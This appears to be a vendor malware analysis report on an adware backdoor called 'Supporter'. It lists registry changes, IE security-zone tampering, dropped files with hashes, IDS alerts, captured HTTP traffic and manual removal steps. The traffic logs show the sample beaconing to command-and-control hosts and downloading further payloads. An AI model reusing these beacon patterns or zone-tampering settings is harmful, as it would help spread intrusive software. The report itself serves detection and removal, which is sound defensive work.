"51d2f2ea" = "JlA /Y//b/Ak/YZ/c//x/W//I//x/CD/Ux/e////"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"3c09c42b" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"e46c271e" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"LRTS" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"27ddcf6f" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"Version" = "22022115"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"bbf88800" = "///%"
"f0bf0bde" = "///%"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BC 22 EC 7F EB E8 66 A0 18 30 12 CF 8D A6 41 3F"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"7f69fa1f" = "///%"
"6185d035" = "VP/h/CP/V//l////"
"d1abcdb6" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"2d71d5ab" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"uuid" = "4520001523740530703"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"a1dcff5b" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"State" = "0"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"370856c7" = ""

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"
"e46c271e" = "///%"
"1520c6f1" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"65114b36" = "Vl/l////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"f0bf0bde" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"3c09c42b" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"a0743acc" = "N/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"370856c7" = ""

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"c5705860" = "Vx////%%"
"dbaf3ce3" = "/P////%%"
"c99a5f5c" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"2e22d94e" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"8b9e4cbc" = "V/////%%"
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
"f6ad6fa6" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"usr.1" = "mPgPJqqomjlhabcdef"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"svn" = "Supporter"
"svi" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"1520c6f1" = "V/////%%"
"414bc593" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"51d2f2ea" = "JlA /Y//b/Ak/YZ/c//x/W//I//x/CD/Ux/e////"
"587b5709" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"c6c5dd44" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"svx" = ""
"svt" = "1421537600"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"
"6185d035" = "VP/h/CP/V//l////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_b0250ce0\eae10f9d]
"340d3099" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"bbf88800" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"Install_Dir" = "%Program Files%\Supporter"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"0e93c3f3" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"48bd1aff" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"340d3099" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{40030ae4}]
"NoRepair" = "1"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"0dc3ee96" = "/P////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"date" = "1421549098"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"65114b36" = "Vl/l////"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"f6ad6fa6" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"2d71d5ab" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{40030ae4}]
"UninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\SUPPOR~1\SUPPOR~1.DLL,_uninstall /un"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"c24899a6" = "Vx/g/CD/Mx////%%"
"a1dcff5b" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"dlpath" = "c:\progra~1\suppor~1\suppor~1.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"2e22d94e" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"c6c5dd44" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"uuid" = "4520001523740530703"
"svpath" = "c:\Program Files\Supporter\Supporter.dll"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"48bd1aff" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"data.0" = "Us ACoyoi 0Qlyurpnwx3D2nv2Ut4mOfyO1WapHlU9CKgtsUB7YxfB3uleoimov9WVC6rV2pn"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
"0e93c3f3" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"d1abcdb6" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{40030ae4}]
"InstallDate" = "20140118"

[HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}]
"40030ae4" = "%Program Files%\Supporter\Supporter.dll"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"72758a5d" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"c99a5f5c" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"38583bc3" = "N//e/Ct/Vx/l/C/////%"
"7367429f" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
"37b7a6d8" = "UlAr/XJ/c//k////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"c24899a6" = "Vx/g/CD/Mx////%%"
"7f69fa1f" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"data.1" = "vPDqmdgAz93mBQIKEGmwWrniVNmX4IyloC5C8UlL9Tzl kgwiT507PnkLLOUSDtbV5/KcNAaxKop4V7umwZJwEJLo"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"fe94ce1e" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"3efeb33e" = ""

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE security zone settings so that all local web-nodes with no dots in their names that do not belong to any other zone are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE security zone settings so that all web-nodes that bypass the proxy are mapped to the Intranet Zone:

"ProxyBypass" = "1"

The Backdoor modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:

"IntranetName" = "1"

The Backdoor deletes the following registry key(s):

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
8af622327e2c6ef36dd2b147ec7d25b7 c:\Program Files\Follow\Follow.exe
d32d158eff9112caba8eea4ba9ca5975 c:\Program Files\PriceLeses\NoXzg4pkazG9ZC.dll
8af622327e2c6ef36dd2b147ec7d25b7 c:\Program Files\PriceLeses\NoXzg4pkazG9ZC.exe
d32d158eff9112caba8eea4ba9ca5975 c:\Program Files\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.dll
8af622327e2c6ef36dd2b147ec7d25b7 c:\Program Files\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 356105 356352 4.87791 107f80c7b2497b87f17b6053858abc7c
.rdata 360448 20226 20480 3.32227 0425f360dbef9ea530c9d62bd96a0497
.data 380928 863812 854016 4.18045 be5e4e00140775f479c4438504b275b9
.rsrc 1245184 112471 114688 3.73244 520e3ad746a2e820383856d794eb62d1
.reloc 1359872 9890 10240 3.164 ae41b41c919a7e9d9def9fe8386787e2

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs



IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET MALWARE W32/InstallRex.Adware Initial CnC Beacon
SURICATA STREAM ESTABLISHED packet out of window
SURICATA STREAM Packet with invalid ack
SURICATA STREAM ESTABLISHED invalid ack
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

HEAD /TyHelper.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Pragma: no-cache
Expect: 100-continue
Host: settlemental.net
Connection: Keep-Alive


HTTP/1.1 100 Continue
HTTP/1.1 200 OK
Server: openresty
Date: Sun, 18 Jan 2015 04:44:26 GMT
Content-Type: application/octet-stream
Content-Length: 6475776
Last-Modified: Fri, 09 Jan 2015 04:20:07 GMT
Connection: close
ETag: "54af56f7-62d000"
Accept-Ranges: bytes


GET /?step_id=1_2&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.winnerican.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sun, 18 Jan 2015 04:44:23 GMT
Content-Type: text/html
Content-Length: 8282
Connection: close
Content-Disposition: attachment; filename="1_2.txt"

<<< skipped >>>

GET /?step_id=1_1&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.winnerican.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sun, 18 Jan 2015 04:43:38 GMT
Content-Type: text/html
Content-Length: 10014
Connection: close
Content-Disposition: attachment; filename="1_1.txt"

<<< skipped >>>

GET /?e=bsp&clsb=1&publisher=55680&country=US&dd=5&cid=767&vn=153&ind=2999701604659561094&exid=&ssd=5870984237522070412&hid=4520001523740530703&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140118 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: bestories.org
Cache-Control: no-cache
Cookie: __cfduid=d6208cc7f1add1143864b04d60cf818e01421556241


HTTP/1.1 200 OK
Date: Sun, 18 Jan 2015 04:44:15 GMT
Content-Type: application/octet-stream
Content-Length: 210912
Connection: keep-alive
Content-Disposition: attachment; filename="wKjUaVakO6heQO.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *
Server: cloudflare-nginx
CF-RAY: 1aa822e6ae3c0ed9-EWR

<<< skipped >>>

GET /?step_id=1&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.winnerican.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sun, 18 Jan 2015 04:43:36 GMT
Content-Type: text/html
Content-Length: 28514
Connection: close
Content-Disposition: attachment; filename="1.txt"

<<< skipped >>>

GET /?e=ytr&cht=2&dd=19&clsb=1&publisher=55680&country=US&ind=2999701604659561094&exid=&ssd=5870984237522070412&hid=4520001523740530703&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140118 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: bestories.org
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sun, 18 Jan 2015 04:44:02 GMT
Content-Type: application/octet-stream
Content-Length: 1480430
Connection: keep-alive
Set-Cookie: __cfduid=d6208cc7f1add1143864b04d60cf818e01421556241; expires=Mon, 18-Jan-16 04:44:01 GMT; path=/; domain=.bestories.org; HttpOnly
Content-Disposition: attachment; filename="yNMtlpV56NSC6w.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *
Server: cloudflare-nginx
CF-RAY: 1aa822905ef50ed9-EWR

<<< skipped >>>

POST / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: r1.flagmisterlibcontent.net
Content-Length: 3599
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sun, 18 Jan 2015 04:43:36 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}


GET /?e=dfd73&cht=2&dcu=1&cpatch=2&dcs=1&pf=1&clsb=1&publisher=55680&&&country=US&ind=2999701604659561094&exid=&ssd=5870984237522070412&hid=4520001523740530703&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140118 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: masterial.net
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sun, 18 Jan 2015 04:43:45 GMT
Content-Type: application/octet-stream
Content-Length: 1523454
Connection: keep-alive
Set-Cookie: __cfduid=df7bd18451bc1541b0698dd4c8d03ba811421556225; expires=Mon, 18-Jan-16 04:43:45 GMT; path=/; domain=.masterial.net; HttpOnly
Content-Disposition: attachment; filename="CmPMt7BDxLvtoE.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *
Server: cloudflare-nginx
CF-RAY: 1aa8222b16e90ed3-EWR

<<< skipped >>>

POST / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: r1.flagmisterlibcontent.net
Content-Length: 2460
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sun, 18 Jan 2015 04:44:20 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}


GET /?step_id=1_1_4&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.winnerican.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sun, 18 Jan 2015 04:44:10 GMT
Content-Type: text/html
Content-Length: 10646
Connection: close
Content-Disposition: attachment; filename="1_1_4.txt"

<<< skipped >>>

GET /?step_id=1_1_3&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.winnerican.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sun, 18 Jan 2015 04:43:56 GMT
Content-Type: text/html
Content-Length: 10474
Connection: close
Content-Disposition: attachment; filename="1_1_3.txt"

<<< skipped >>>

GET /TyHelper.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Pragma: no-cache
Expect: 100-continue
Host: settlemental.net
Connection: Keep-Alive


HTTP/1.1 100 Continue
HTTP/1.1 200 OK
Server: openresty
Date: Sun, 18 Jan 2015 04:44:26 GMT
Content-Type: application/octet-stream
Content-Length: 6475776
Last-Modified: Fri, 09 Jan 2015 04:20:07 GMT
Connection: close
ETag: "54af56f7-62d000"
Accept-Ranges: bytes

<<< skipped >>>

The Backdoor connects to the servers at the following location(s):

rundll32.exe_1324:

.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
GDI32.dll
USER32.dll
IMAGEHLP.dll
rundll32.pdb
.manifest
5.1.2600.5512 (xpsp.080413-2105)
RUNDLL.EXE
Windows
Operating System
5.1.2600.5512
There is not enough memory to run the file %s.
Please close other windows and try again.
The file %s or one of its components could not be opened.
The file %s or one of its components cannot run.
The file %s or one of its components requires a different version of Windows.
The file %s or one of its components cannot run in standard or enhanced mode Windows.
Another instance of the file %s is already running.
An exception occurred while trying to run "%s"
Error in %s
Missing entry:%s
Error loading %s


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    mscorsvw.exe:172
    regsvr32.exe:388
    regsvr32.exe:1776
    rundll32.exe:1848
    rundll32.exe:1324
    %original file name%.exe:2008
    %original file name%.exe:1664
    %original file name%.exe:1252
    %original file name%.exe:596
    TyHelpTFUO.exe:1516

  2. Delete the original Backdoor file.
  3. Delete or disinfect the following files created/modified by the Backdoor:

    %Documents and Settings%\%current user%\Local Settings\Temp\3e88bb2a\temp.ca (10801 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@masterial[1].txt (219 bytes)
    %Program Files%\PriceLeses\NoXzg4pkazG9ZC.dll (3927 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TL9OQ0XO\CmPMt7BDxLvtoE[1].ca (5431 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
    %Program Files%\PriceLeses\NoXzg4pkazG9ZC.dat (26 bytes)
    %Program Files%\PriceLeses\NoXzg4pkazG9ZC.tlb (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2027aD4c704\images\loader.gif (2 bytes)
    %Documents and Settings%\All Users\Application Data\17537857206796671995\cd5b15e575e1c3d03eba457016c7580f.ini (508 bytes)
    %Program Files%\PriceLeses\NoXzg4pkazG9ZC.exe (838 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2027aD4c704\images\progressbar.gif (588 bytes)
    %Program Files%\Follow\Follow.dat (6 bytes)
    %Program Files%\Follow\Follow.exe (838 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9LLCZ7S\wKjUaVakO6heQO[1].ca (210 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\00f6573f\temp.ca (1491 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\0f77a858\temp.ca (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\68f19A9f\images\loader.gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\68f19A9f\images\progressbar.gif (588 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\r1.flagmisterlibcontent[2] (2 bytes)
    %Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.exe (838 bytes)
